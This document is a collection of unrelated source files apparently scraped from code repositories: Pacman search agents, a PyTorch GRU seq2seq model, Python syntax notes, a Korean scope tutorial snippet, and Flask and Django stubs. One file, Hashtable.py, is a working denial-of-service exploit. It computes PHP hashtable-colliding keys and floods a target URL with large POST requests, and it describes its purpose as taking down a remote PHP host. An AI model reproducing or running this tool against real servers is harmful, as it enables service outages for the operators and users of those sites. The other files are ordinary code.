        self._expanded += 1 # DO NOT CHANGE
        for direction in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
            x,y = state[0]
            dx, dy = Actions.directionToVector(direction)
            nextx, nexty = int(x + dx), int(y + dy)
            if not self.walls[nextx][nexty]:
                # Copy the grid and eat any food at the successor square.
                nextFood = state[1].copy()
                nextFood[nextx][nexty] = False
                successors.append( ( ((nextx, nexty), nextFood), direction, 1) )
        return successors
    def getCostOfActions(self, actions):
        """Returns the cost of a particular sequence of actions.  If those actions
        include an illegal move, return 999999"""
        x,y= self.getStartState()[0]
        cost = 0
        for action in actions:
            # figure out the next state and see whether it's legal
            dx, dy = Actions.directionToVector(action)
            x, y = int(x + dx), int(y + dy)
            if self.walls[x][y]:
                return 999999
            cost += 1
        return cost
class AStarFoodSearchAgent(SearchAgent):
    """SearchAgent running A* on FoodSearchProblem with foodHeuristic."""
    def __init__(self):
        def astar_with_food(prob):
            return search.aStarSearch(prob, foodHeuristic)
        self.searchFunction = astar_with_food
        self.searchType = FoodSearchProblem
def foodHeuristic(state, problem):
    """
    Heuristic for the FoodSearchProblem.

    state is (pacmanPosition, foodGrid); foodGrid is a Grid of booleans
    (see game.py).  The estimate is: maze distance from Pacman to the
    nearest remaining pellet, plus the largest maze distance from that
    pellet to any remaining pellet — covering the farthest stretch avoids
    double-counting pellets that lie along the way.

    problem.heuristicInfo is available for caching, and problem.walls for
    layout queries.
    """
    pacman_pos, food_grid = state
    if problem.isGoalState(state):
        return 0
    start_state = problem.startingGameState
    # (pelletPosition, mazeDistance-to-Pacman) for every remaining pellet.
    remaining = [
        (pos, mazeDistance(pos, pacman_pos, start_state))
        for pos in food_grid.asList()
        if food_grid[pos[0]][pos[1]]
    ]
    if not remaining:
        return 0
    nearest_pos, nearest_dist = min(remaining, key=lambda entry: entry[1])
    # Longest maze distance from the nearest pellet to any pellet.
    farthest = max(mazeDistance(nearest_pos, pos, start_state)
                   for pos, _ in remaining)
    return nearest_dist + farthest
class ClosestDotSearchAgent(SearchAgent):
    "Search for all food using a sequence of searches"
    def registerInitialState(self, state):
        """Repeatedly plan a path to the nearest dot until no food remains,
        concatenating the per-segment action lists."""
        self.actions = []
        currentState = state
        while(currentState.getFood().count() > 0):
            nextPathSegment = self.findPathToClosestDot(currentState) # The missing piece
            self.actions += nextPathSegment
            for action in nextPathSegment:
                # Sanity check: replay each planned action and make sure it
                # stays legal as the game state evolves.
                legal = currentState.getLegalActions()
                if action not in legal:
                    t = (str(action), str(currentState))
                    raise Exception, 'findPathToClosestDot returned an illegal move: %s!\n%s' % t
                currentState = currentState.generateSuccessor(0, action)
        self.actionIndex = 0
        print 'Path found with cost %d.' % len(self.actions)
    def findPathToClosestDot(self, gameState):
        """
        Returns a path (a list of actions) to the closest dot, starting from
        gameState.
        """
        # Here are some useful elements of the startState
        # NOTE(review): startPosition, food and walls below are unused — kept
        # from the assignment template.
        startPosition = gameState.getPacmanPosition()
        food = gameState.getFood()
        walls = gameState.getWalls()
        problem = AnyFoodSearchProblem(gameState)
        "*** YOUR CODE HERE ***"
        # Uniform-cost search finds the closest dot (unit step costs).
        #return search.depthFirstSearch(problem)
        return search.uniformCostSearch(problem)
        # NOTE(review): unreachable template leftover below.
        util.raiseNotDefined()
class AnyFoodSearchProblem(PositionSearchProblem):
    """
    A search problem for finding a path to any food.

    Identical to PositionSearchProblem except for the goal test: any
    position that contains food is a goal.  The state space and successor
    function are inherited unchanged.  Used by
    ClosestDotSearchAgent.findPathToClosestDot.
    """
    def __init__(self, gameState):
        "Stores information from the gameState. You don't need to change this."
        # Store the food for later reference
        self.food = gameState.getFood()
        # Store info for the PositionSearchProblem (no need to change this)
        self.walls = gameState.getWalls()
        self.startState = gameState.getPacmanPosition()
        self.costFn = lambda x: 1
        self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
    def isGoalState(self, state):
        """
        The state is Pacman's (x, y) position; it is a goal iff that square
        contains food.
        """
        x,y = state
        # Fix: removed the unreachable assignment-template leftovers
        # ("*** YOUR CODE HERE ***" / util.raiseNotDefined()) that followed
        # this return statement.
        return self.food[x][y]
def mazeDistance(point1, point2, gameState):
    """
    Returns the maze distance between any two points, computed by running
    BFS on a PositionSearchProblem.  The gameState can be any game state —
    Pacman's position in that state is ignored.
    Example usage: mazeDistance( (2,4), (5,6), gameState)
    """
    walls = gameState.getWalls()
    # Both endpoints must be walkable squares.
    for label, pt in (('point1', point1), ('point2', point2)):
        assert not walls[pt[0]][pt[1]], label + ' is a wall: ' + str(pt)
    search_prob = PositionSearchProblem(
        gameState, start=point1, goal=point2, warn=False, visualize=False)
    return len(search.bfs(search_prob))
|
[
"swaroopkpydisetty@gmail.com"
] |
swaroopkpydisetty@gmail.com
|
1f7a73fb2528f3c82b8b5f1b7691f0bf7f9c572a
|
6040ec2771a81654ac41f33ce5c4aa7e66d4e5d9
|
/src/파이썬코드(py)/Ch06/code_6_8_2.py
|
5b3b1e11fc54f5ace2dfd3b7cd1cebb773201c31
|
[] |
no_license
|
jinseoo/DataSciPy
|
a3462785ae094530141e66ead8de9e6519fbf193
|
de6127c0741f8d0cfc989e17ba3a5a65004e5d9c
|
refs/heads/master
| 2023-06-25T19:03:22.086126
| 2021-07-27T09:01:41
| 2021-07-27T09:01:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 330
|
py
|
#
# 따라하며 배우는 파이썬과 데이터과학(생능출판사 2020)
# 6.8 변수의 범위는 어디까지인가, 155쪽
#
def print_counter():
    """Print a function-local ``counter`` to demonstrate variable scope."""
    counter = 200
    print('counter =', counter) # counter value inside the function (local scope)
counter = 100
print_counter()
print('counter =', counter) # counter value outside the function (module scope)
|
[
"hojoon1619@gmail.com"
] |
hojoon1619@gmail.com
|
101f2007b71bc63efbdd759b3ee37b183fdd834e
|
a7ba18930a3c84dba19ed0f2f580e6c759e1d0b9
|
/gru_model.py
|
fc37a98f6d4c49e8544c9c4da1aca62c9822d342
|
[] |
no_license
|
soaxelbrooke/twitter-cs-seq2seq
|
4b2dec6badc9f0000702b1fdd0ef17ef91d67d5e
|
c0ca22273150abf76a4a4e2795b7d7d507268d91
|
refs/heads/master
| 2021-07-19T09:05:26.667954
| 2017-10-25T10:32:39
| 2017-10-25T10:32:39
| 106,000,174
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,672
|
py
|
from collections import deque
import torch
from numpy import ndarray
from torch import nn
from torch.autograd import Variable
import torch.nn.functional as F
import random
from torch import optim
from tqdm import tqdm
import numpy as np
from typing import NamedTuple
# Hyper-parameters shared by the encoder, decoder and training loop.
# Fix: the NamedTuple typename previously read 'Seq2SeqParams', which did not
# match the bound name — that breaks pickling (pickle looks the type up by its
# __name__) and produces a misleading repr.
Seq2SeqConfig = NamedTuple('Seq2SeqConfig', (
    ('message_len', int),          # tokens per (padded) message
    ('batch_size', int),
    ('context_size', int),         # GRU hidden size
    ('embed_size', int),
    ('use_cuda', bool),
    ('vocab_size', int),
    ('start_token', str),
    ('encoder_layers', int),
    ('learning_rate', float),
    ('teacher_force_ratio', float),  # probability of teacher forcing per batch
))
def build_model(cfg, start_idx, pad_idx):
    # type: (Seq2SeqConfig, int, int) -> GruModel
    """Assemble encoder, decoder and their shared embedding into a GruModel.

    `start_idx` primes the decoder; `pad_idx` marks the embedding's padding
    row.  Both sub-networks are moved to the GPU when cfg.use_cuda.
    """
    embedding = build_shared_embedding(cfg, pad_idx)
    enc = GruEncoder(cfg, embedding, 1)
    dec = GruDecoder(cfg, embedding, 1)
    if cfg.use_cuda:
        enc.cuda()
        dec.cuda()
    return GruModel(cfg, enc, dec, embedding, start_idx)
def build_shared_embedding(cfg, pad_idx):
    # type: (Seq2SeqConfig, int) -> nn.Embedding
    """Build the embedding table shared by encoder and decoder.

    Fix: the `# type:` comment previously sat *after* the docstring, where
    PEP 484 tooling ignores it; it must immediately follow the signature.
    pad_idx is cast to int — presumably because callers may pass a numpy
    integer (TODO confirm); Embedding requires a plain int padding_idx.
    """
    return nn.Embedding(cfg.vocab_size, cfg.embed_size, padding_idx=int(pad_idx))
class GruModel:
def __init__(self, seq2seq_cfg, encoder, decoder, embedding, start_idx):
# type: (Seq2SeqConfig, GruEncoder, GruDecoder, nn.Embedding, int) -> None
self.cfg = seq2seq_cfg
self.encoder = encoder
self.decoder = decoder
self.embedding = embedding
self.start_idx = start_idx
self.gradient_clip = 5.0
self.teacher_force_ratio = seq2seq_cfg.teacher_force_ratio
self.learning_rate = seq2seq_cfg.learning_rate
self.encoder_optimizer = optim.RMSprop(self.encoder.parameters(), lr=self.learning_rate)
self.decoder_optimizer = optim.RMSprop(self.decoder.parameters(), lr=self.learning_rate)
self.loss_fn = nn.NLLLoss()
def teacher_should_force(self):
return random.random() < self.teacher_force_ratio
def train_epoch(self, train_x, train_y, experiment=None):
# type: (ndarray, ndarray) -> float
""" Trains a single epoch. Returns training loss. """
progress = tqdm(total=len(train_x))
loss_queue = deque(maxlen=256)
train_x = train_x.astype('int64')
train_y = train_y.astype('int64')
idx_iter = zip(range(0, len(train_x) - self.cfg.batch_size, self.cfg.batch_size),
range(self.cfg.batch_size, len(train_x), self.cfg.batch_size))
total_loss = 0
last_step = 1
for step, (start, end) in enumerate(idx_iter):
x_batch = train_x[start:end]
y_batch = train_y[start:end]
if (len(x_batch) == 0) or (len(y_batch) == 0):
break
x_batch = torch.LongTensor(x_batch)
y_batch = torch.LongTensor(y_batch)
if self.cfg.use_cuda:
x_batch = x_batch.cuda()
y_batch = y_batch.cuda()
loss = self._train_inner(
Variable(x_batch.view(-1, self.cfg.batch_size)),
Variable(y_batch.view(-1, self.cfg.batch_size)),
)
if (experiment is not None) and ((step + 1) % 20 == 0):
experiment.log_metric('loss', np.mean(loss_queue))
total_loss += loss
loss_queue.append(loss)
progress.set_postfix(loss=np.mean(loss_queue), refresh=False)
progress.update(self.cfg.batch_size)
last_step = step + 1
avg_loss = total_loss / last_step
if experiment is not None:
experiment.log_metric('loss', avg_loss)
return avg_loss
def _train_inner(self, input_var_batch, target_var_batch):
# type: (ndarray, ndarray) -> float
self.encoder_optimizer.zero_grad()
self.decoder_optimizer.zero_grad()
loss = 0
enc_hidden_state = self.encoder.init_hidden()
encoder_outputs, decoder_hidden = self.encoder(input_var_batch, enc_hidden_state)
decoder_input = Variable(torch.LongTensor([[self.start_idx]] * self.cfg.batch_size))
if self.cfg.use_cuda:
decoder_input = decoder_input.cuda()
should_use_teacher = self.teacher_should_force()
for input_idx in range(self.cfg.message_len):
decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden)
loss += self.loss_fn(decoder_output, target_var_batch[input_idx, :])
if should_use_teacher:
decoder_input = target_var_batch[input_idx, :]
else:
# Get the highest values and their indexes over axis 1
top_vals, top_idxs = decoder_output.data.topk(1)
decoder_input = Variable(top_idxs.squeeze())
loss.backward()
nn.utils.clip_grad_norm(self.encoder.parameters(), self.gradient_clip)
nn.utils.clip_grad_norm(self.decoder.parameters(), self.gradient_clip)
self.encoder_optimizer.step()
self.decoder_optimizer.step()
return loss.data.sum() / self.cfg.message_len
def predict(self, requests):
""" Predict a response for this request """
# type: (ndarray) -> ndarray
x = torch.LongTensor(requests.astype('int64')).view(-1, self.cfg.batch_size)
if self.cfg.use_cuda:
x = x.cuda()
encoder_outputs, decoder_hidden = self.encoder(Variable(x), self.encoder.init_hidden())
decoder_input = Variable(torch.LongTensor([[self.start_idx]] * self.cfg.batch_size))
decoder_outputs = \
torch.LongTensor([[self.start_idx]] * self.cfg.batch_size * self.cfg.message_len)\
.view(self.cfg.message_len, self.cfg.batch_size)
if self.cfg.use_cuda:
decoder_input = decoder_input.cuda()
should_use_teacher = self.teacher_should_force()
for input_idx in range(self.cfg.message_len):
decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden)
top_vals, top_idxs = decoder_output.data.topk(1)
decoder_input = Variable(top_idxs.squeeze())
decoder_outputs[input_idx, :] = top_idxs.squeeze()
return decoder_outputs.numpy().T
    def evaluate(self, test_x, test_y):
        # type: (ndarray, ndarray) -> float
        """ Evaluates model quality on test dataset, returning loss.

        NOTE(review): unimplemented stub — the docstring is the entire body,
        so this implicitly returns None rather than the float promised by the
        type comment. Implement or remove before relying on it.
        """
class GruEncoder(nn.Module):
    """GRU encoder.

    Embeds a minibatch of token-index sequences and runs it through a GRU,
    handing the decoder the final output slice and final hidden layer as the
    conversation context.
    """

    def __init__(self, seq2seq_params, embedding, n_layers=1):
        # type: (Seq2SeqConfig, nn.Embedding, int) -> None
        super(GruEncoder, self).__init__()
        self.cfg = seq2seq_params
        # Layer count comes from the config; the n_layers argument is kept
        # only for signature compatibility and is not consulted.
        self.n_layers = seq2seq_params.encoder_layers
        self.embedding = embedding
        self.rnn = nn.GRU(
            input_size=self.cfg.embed_size,
            hidden_size=self.cfg.context_size,
            num_layers=self.n_layers,
        )

    def forward(self, word_idxs, hidden_state):
        """Encode one minibatch of token indexes into a context vector pair."""
        seq_shape = (self.cfg.message_len, self.cfg.batch_size, self.cfg.embed_size)
        embedded_seq = self.embedding(word_idxs).view(*seq_shape)
        rnn_out, rnn_hidden = self.rnn(embedded_seq, hidden_state)
        # Keep only the last time step / top layer, restoring a leading axis.
        return rnn_out[-1].unsqueeze(0), rnn_hidden[-1].unsqueeze(0)

    def init_hidden(self):
        """Zero-initialized hidden state, moved to the GPU when configured."""
        zeros = torch.zeros(self.n_layers, self.cfg.batch_size, self.cfg.context_size)
        initial = Variable(zeros)
        if self.cfg.use_cuda:
            return initial.cuda()
        return initial
class GruDecoder(nn.Module):
    """GRU decoder.

    Consumes one token per row of the minibatch plus the previous hidden
    state and produces a log-probability distribution over the vocabulary.
    """

    def __init__(self, seq2seq_params, embedding, n_layers, dropout_p=0.1):
        # type: (Seq2SeqConfig, nn.Embedding, int, float) -> None
        super(GruDecoder, self).__init__()
        self.cfg = seq2seq_params
        self.n_layers = n_layers
        self.dropout_p = dropout_p
        self.embedding = embedding
        self.dropout = nn.Dropout(self.dropout_p)
        # NOTE(review): GRU-internal dropout only applies *between* stacked
        # layers, so it is a no-op (and warns) when n_layers == 1.
        self.rnn = nn.GRU(
            input_size=self.cfg.embed_size,
            hidden_size=self.cfg.context_size,
            num_layers=self.n_layers,
            dropout=self.dropout_p,
        )
        self.out = nn.Linear(self.cfg.context_size, self.cfg.vocab_size)

    def forward(self, word_idx_slice, last_hidden_state):
        """ Processes a single slice of the minibatch - a single word per row.

        :param word_idx_slice: one token index per batch row.
        :param last_hidden_state: hidden state from the previous step.
        :return: (log-prob distribution over vocab, new hidden state).
        """
        embedded_words = self.embedding(word_idx_slice) \
            .view(1, self.cfg.batch_size, self.cfg.embed_size)
        post_dropout_words = self.dropout(embedded_words)
        output, hidden_state = self.rnn(post_dropout_words, last_hidden_state)
        # Fix: pass dim explicitly — the implicit-dim form of log_softmax is
        # deprecated; dim=1 is the vocab axis of the (batch, vocab) logits and
        # matches the legacy implicit choice for 2-D input, so behavior is
        # unchanged.
        word_dist = F.log_softmax(self.out(output.squeeze(0)), dim=1)
        return word_dist, hidden_state
|
[
"stuart@axelbrooke.com"
] |
stuart@axelbrooke.com
|
0a7dc15098a11e2585324fc2d0969841cf17bb22
|
f77b2c4b5808c360e8644644b0b3dba401ed3682
|
/random_games/python_syntax.py
|
1c3841b39cc9283bd72db28c63247c12c7a8bb21
|
[] |
no_license
|
616049195/random_junks
|
6a29393b7fcdb9b8968ff252446380effd629216
|
c616a29b1a0025f3451870ed660e28b81126e97e
|
refs/heads/master
| 2021-01-16T21:00:47.286799
| 2013-11-23T23:42:22
| 2013-11-23T23:42:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,645
|
py
|
"""
Python syntax...
"""
# list comprehension
## syntax
new_list = [x for x in range(1,6)]
# => [1, 2, 3, 4, 5]
##
## examples
even_squares = [x**2 for x in range(1,11) if (x)%2 == 0]
##
# dictionary
my_dict = {
'name' : "Hyunchel",
'age' : 23,
'citizenship' : "Republic of Korea"
}
print my_dict.keys()
print my_dict.values()
for key in my_dict:
print key, my_dict[key]
#
# list slicing
## syntax
[start:end:stride]
# same as range() syntax:
# [inclusive : exclusive : stride]
# if you omit a value, it falls back to the default [first:last:1]
# negative values change direction (reverse...)
##
l = [i ** 2 for i in range(1, 11)]
# Should be [1, 4, 9, 16, 25, 36, 49, 64, 81, 100]
print l[0:9:2]
## omitting
my_list = range(1, 11) # List of numbers 1 - 10
# Add your code below!
print my_list[::2]
##
## reversing
my_list = range(1, 11)
# Add your code below!
backwards = my_list[::-1]
print backwards
##
# lambda
## syntax
# lambda variable: expression
##
squares = [x**2 for x in range(1, 11)]
print filter(lambda x: x >= 30 and x <= 70, squares)
#
## file i/o
#----__enter__() and __exit__() invocation "with" and "as" syntax
#syntax
with open("file", "mode") as variable:
# Read or write to the file
#
#### "variable" is created for good. it can be used after the statement. ###
#examples
with open("text.txt", "w") as textfile:
textfile.write("Success!")
#
#_---- File's member variable "closed" is set to True/False depending on the file's open status
with open("text.txt", "r+") as my_file:
my_file.write("HONEY")
if not my_file.closed:
my_file.close()
print my_file.closed
#
##
|
[
"hyunchelkk@gmail.com"
] |
hyunchelkk@gmail.com
|
6cf0811024e03797d865654b2f6c18918e1db095
|
31948daa03278629f577fe9f6dcc19b6480604e7
|
/Hashtable.py
|
1c05fe90bb777f22d4b21f63c636581d14b938f1
|
[
"Unlicense"
] |
permissive
|
SpyEyeFamily/DarkSouL_ReaCt0r
|
4019d607630457ebb8bd0215dafcd39daee4d772
|
8cde5e03b2120237a345a92b20208efb287b6591
|
refs/heads/master
| 2020-12-28T20:20:18.755049
| 2016-09-17T23:17:46
| 2016-09-17T23:17:46
| 68,482,914
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,617
|
py
|
#! /usr/bin/env python
###########################
# Copyrights Please #
###########################
###########################
# My Original Code #
###########################
# WhoAmi :
#https://www.facebook.com/Gods.nd.kings
#https://www.facebook.com/clayteamwhoami
"""
Examples:
-) Make a single Request, wait for the response and save the response to output0.html
python Hashtable.py -u https://host/index.php -v -c 1 -w -o output -t PHP
-) Take down a server(make 500 requests without waiting for a response):
python Hashtable.py -u https://host/index.php -v -c 500 -t PHP
Changelog:
v5.0: Define max payload size as parameter
v4.0: Get PHP Collision Chars on the fly
v3.0: Load Payload from file
v2.0: Added Support for https, switched to HTTP 1.1
v1.0: Initial Release
"""
#############################
# LIBRARIES #
#############################
import socket
import sys, os
import sys
import math
import urllib
import string
import time
import urlparse
import argparse
import ssl
import random
import itertools
####################
# Main #
####################
def main():
parser = argparse.ArgumentParser(description="| Take down a remote PHP Host |"
"| Coder Name : WhoAmi |"
"| Team Name : CLAY TeaM |"
,prog="PHP Hashtable Exploit3r v1.0")
parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
parser.add_argument("-s", "--save", dest="save", help="Save payload to file")
parser.add_argument("-p", "--payload", dest="payload", help="Save payload to file")
parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
parser.add_argument("-t", "--target", dest="target", help="Target of the attack", choices=["ASP", "PHP", "JAVA"], required=True)
parser.add_argument("-m", "--max-payload-size", dest="maxpayloadsize", help="Maximum size of the Payload in Megabyte. PHPs defaultconfiguration does not allow more than 8MB", default=8, type=int)
parser.add_argument("--version", action="version", version="%(prog)s 5.0")
#############################
# FUNCTIONS #
#############################
options = parser.parse_args()
url = urlparse.urlparse(options.url)
if not url.scheme:
print("Please provide a scheme to the URL(http://, https://,..")
sys.exit(1)
host = url.hostname
path = url.path
port = url.port
if not port:
if url.scheme == "https":
port = 443
elif url.scheme == "http":
port = 80
else:
print("Unsupported Protocol %s" % url.scheme)
sys.exit(1)
if not path:
path = "/"
if not options.payload:
print("Generating Payload...")
if options.target == "PHP":
payload = generatePHPPayload()
elif options.target == "ASP":
#payload = generateASPPayload()
print("Target %s not yet implemented" % options.target)
sys.exit(1)
elif options.target == "JAVA":
#payload = generateJAVAPayload()
print("Target %s not yet implemented" % options.target)
sys.exit(1)
else:
print("Target %s not yet implemented" % options.target)
sys.exit(1)
print("Payload generated")
if options.save:
f = open(options.save, "w")
f.write(payload)
f.close()
print("Payload saved to %s" % options.save)
else:
f = open(options.payload, "r")
payload = f.read()
f.close()
print("Loaded Payload from %s" % options.payload)
# trim to maximum payload size (in MB)
maxinmb = options.maxpayloadsize*1024*1024
payload = payload[:maxinmb]
print("Host: %s" % host)
print("Port: %s" % str(port))
print("path: %s" % path)
print
print
for i in range(options.count):
print("sending Request #%s..." % str(i+1))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if url.scheme == "https":
ssl_sock = ssl.wrap_socket(sock)
ssl_sock.connect((host, port))
ssl_sock.settimeout(None)
else:
sock.connect((host, port))
sock.settimeout(None)
request = "POST %s HTTP/1.1\r\n\
Host: %s\r\n\
Content-Type: application/x-www-form-urlencoded\r\n\
Connection: Close\r\n\
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n\
Content-Length: %s\r\n\
\r\n\
%s\r\n\
\r\n" % (path, host, str(len(payload)), payload)
if url.scheme == "https":
ssl_sock.send(request)
else:
sock.send(request)
if options.verbose:
if len(request) > 400:
print(request[:400]+"....")
else:
print(request)
print("")
if options.wait or options.output:
start = time.time()
if url.scheme == "https":
data = ssl_sock.recv(1024)
string = ""
while len(data):
string = string + data
data = ssl_sock.recv(1024)
else:
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
elapsed = (time.time() - start)
print("Request %s finished" % str(i+1))
print("Request %s duration: %s" % (str(i+1), elapsed))
split = string.partition("\r\n\r\n")
header = split[0]
content = split[2]
if options.verbose:
# only print http header
print("")
print(header)
print("")
if options.output:
f = open(options.output+str(i)+".html", "w")
f.write("<!-- "+header+" -->\r\n"+content)
f.close()
if url.scheme == "https":
ssl_sock.close()
sock.close()
else:
sock.close()
def generateASPPayload():
    # Stub: ASP payload generation is not implemented (main() exits with
    # "not yet implemented" for this target); returns a harmless placeholder.
    return "a=a"
def generateJAVAPayload():
    # Stub: JAVA payload generation is not implemented (main() exits with
    # "not yet implemented" for this target); returns a harmless placeholder.
    return "b=b"
def generatePHPPayload():
# Note: Default max POST Data Length in PHP is 8388608 bytes (8MB)
# compute entries with collisions in PHP hashtable hash function
a = computePHPCollisionChars(5)
return _generatePayload(a, 8);
def _generatePayload(collisionchars, payloadlength):
# Taken from:
# https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
# how long should the payload be
length = payloadlength
size = len(collisionchars)
post = ""
maxvaluefloat = math.pow(size,length)
maxvalueint = int(math.floor(maxvaluefloat))
for i in range (maxvalueint):
inputstring = _base_convert(i, size)
result = inputstring.rjust(length, "0")
for item in collisionchars:
result = result.replace(str(item), collisionchars[item])
post += "" + urllib.quote(result) + "=&"
return post;
def _base_convert(num, base):
fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
alphabet = fullalphabet[:base]
if (num == 0):
return alphabet[0]
arr = []
base = len(alphabet)
while num:
rem = num % base
num = num // base
arr.append(alphabet[rem])
arr.reverse()
return "".join(arr)
def computePHPCollisionChars(count):
hashes = {}
counter = 0
length = 2
a = ""
for i in range(1, 254):
a = a+chr(i)
source = list(itertools.product(a, repeat=length))
basestr = ''.join(random.choice(source))
basehash = _DJBX33A(basestr)
print("\tValue: %s\tHash: %s" % (basestr, basehash))
hashes[str(counter)] = basestr
counter = counter + 1
for item in source:
tempstr = ''.join(item)
if tempstr == basestr:
continue
temphash = _DJBX33A(tempstr)
if temphash == basehash:
print("\tValue: %s\tHash: %s" % (tempstr, temphash))
hashes[str(counter)] = tempstr
counter = counter + 1
if counter >= count:
break;
if counter != count:
print("Not enough values found. Please start the script again")
sys.exit(1)
return hashes
def _DJBX(inputstring, base, start):
counter = len(inputstring) - 1
result = start
for item in inputstring:
result = result + (math.pow(base, counter) * ord(item))
counter = counter - 1
return int(round(result))
#PHP
def _DJBX33A(inputstring):
    """DJBX33A hash (base 33, initial value 5381), labeled here as PHP's
    hashtable hash; delegates to the generic _DJBX accumulator."""
    return _DJBX(inputstring, 33, 5381)
#ASP
def _DJBX33X(inputstring):
counter = len(inputstring) - 1
result = 5381
for item in inputstring:
result = result + (int(round(math.pow(33, counter))) ^ ord(item))
counter = counter - 1
return int(round(result))
if __name__ == "__main__":
main()
|
[
"noreply@github.com"
] |
SpyEyeFamily.noreply@github.com
|
43fcc04dae20aad1bf6fb21779872c8b34188828
|
bf59fae2a9513c008bab786ea277ff88fe3b335c
|
/Nemisa_mvp/nemisa_app.py
|
43ac793ceefaf0125f2655be72ab8ed312a9f357
|
[] |
no_license
|
Simangele101/Nemisa_hack_2021
|
316320c493b67850da4ff2c9295ad51480d9c887
|
f56c3a51398090cc33008fde3314fdb130bd62b9
|
refs/heads/master
| 2023-04-22T19:53:30.902634
| 2021-04-16T16:20:20
| 2021-04-16T16:20:20
| 358,657,229
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 799
|
py
|
"""
Simple Streamlit webserver application for serving developed classification
models.
Author: Rogue byte Analytica.
Note:
---------------------------------------------------------------------
Plase follow the instructions provided within the README.md file
located within this directory for guidance on how to use this script
correctly.
---------------------------------------------------------------------
For further help with the Streamlit framework, see:
https://docs.streamlit.io/en/latest/
"""
#import Dependencies
import streamlit as st
import datetime
import pandas as pd
def main():
    """Render the Streamlit landing page for the Nemisa hackathon demo."""
    st.header('Hello Nemisa Hackathon')
    team_banner = "<h3 align='center'>This is Rogue Byte Analytica</h3>"
    st.write(team_banner, unsafe_allow_html=True)


if __name__ == '__main__':
    main()
|
[
"68602378+Simangele101@users.noreply.github.com"
] |
68602378+Simangele101@users.noreply.github.com
|
52dad76367c862489da289aed0ad49fd4d6a600d
|
b04279709d7133e310cca957f85d9bed259cfbdf
|
/application/settings/develop.py
|
30811838eae0cccaadbe9f5b7702cc17ecb69d46
|
[] |
no_license
|
fujimisakari/otherbu
|
7230de39670815d6d72be13aa293f08a128f13d0
|
d70a0c21858e5d37a3cf3fca81b69ea7f73af661
|
refs/heads/master
| 2022-12-10T17:27:15.411751
| 2019-01-02T18:02:46
| 2019-01-02T18:02:46
| 8,172,410
| 0
| 0
| null | 2022-12-08T00:54:53
| 2013-02-13T03:20:05
|
Python
|
UTF-8
|
Python
| false
| false
| 76
|
py
|
# Development-environment settings: extend the shared base settings with
# debug-oriented toggles.
from .base import *
DEBUG = True
TEMPLATE_DEBUG = DEBUG  # template debugging tracks the main debug flag
AUTO_LOGIN = DEBUG  # NOTE(review): presumably auto-authenticates in dev -- confirm where base/app reads this
|
[
"fujimisakari@gmail.com"
] |
fujimisakari@gmail.com
|
8b5bdf81def59b8f6930c4ce22ec1874049a0005
|
8d91f8867fb5b72ca257d9e7152188914154ccd1
|
/pune/controllers/admin/user.py
|
4c97fbd2cff00fce7bec04ce0a205ce7b77a0945
|
[] |
no_license
|
liwushuo/pune
|
c6420e9a3f65711cc7a6c578720122e5b7f53eb9
|
23eae59fc3d3515903700740fade1bce8b8d6e12
|
refs/heads/master
| 2021-01-10T08:10:41.056344
| 2016-04-18T08:45:01
| 2016-04-18T08:45:01
| 53,919,940
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 331
|
py
|
# -*- coding: utf-8 -*-
from flask import render_template
from flask import request
from flask import redirect
from flask import url_for
from flask import abort
from flask import flash
from flask import current_app
from pune.service import UserService
from . import bp
@bp.route('/usrs')
def list_users():
    """Placeholder user-listing endpoint; returns a static string body."""
    # NOTE(review): the route path '/usrs' looks like a typo for '/users' --
    # confirm before changing, since the URL is part of the public interface.
    return 'nothing'
|
[
"maplevalley8@gmail.com"
] |
maplevalley8@gmail.com
|
f76e193dc89f82660d667f368bb4936852252bc2
|
29e8e04876b8cf03dd8755ad1d085a755d3f4061
|
/venv/bin/chardetect
|
f3f63f7830033730f7309d96f51b19c34c7b028a
|
[
"MIT"
] |
permissive
|
haideraltahan/CropMe
|
431d213f2163c08579415bf3fc7708366ccd2d78
|
75a111b9d3b2c50c6f2a9a36d21432053f02284d
|
refs/heads/master
| 2020-05-30T07:37:18.713374
| 2019-05-31T20:15:19
| 2019-05-31T20:15:19
| 189,601,563
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 251
|
#!/home/haider/Desktop/CropMe/venv/bin/python
# -*- coding: utf-8 -*-
# Console-script shim for the chardet CLI.
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
    # Strip setuptools wrapper suffixes ("-script.py", ".exe") from argv[0]
    # so usage text shows the bare command name, then exit with the CLI's
    # return code.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
|
[
"haideraltahan@gmail.com"
] |
haideraltahan@gmail.com
|
|
56c0e641146ff1f1664bf1b038aae0946cb7f434
|
6dc12a6426b18e1266639f023cc8d356055aed71
|
/Treadmillwebsite/apps.py
|
f2c9786e1c7982839f5423a66e2f67ec567feaf2
|
[] |
no_license
|
kiranM235/Treadmill-Website-Django
|
6d4e040bed03bfdca06e6fc4c0207dad92c071c2
|
35bb2eb6c19a0b5006f334a761ddfa7c14b4d345
|
refs/heads/master
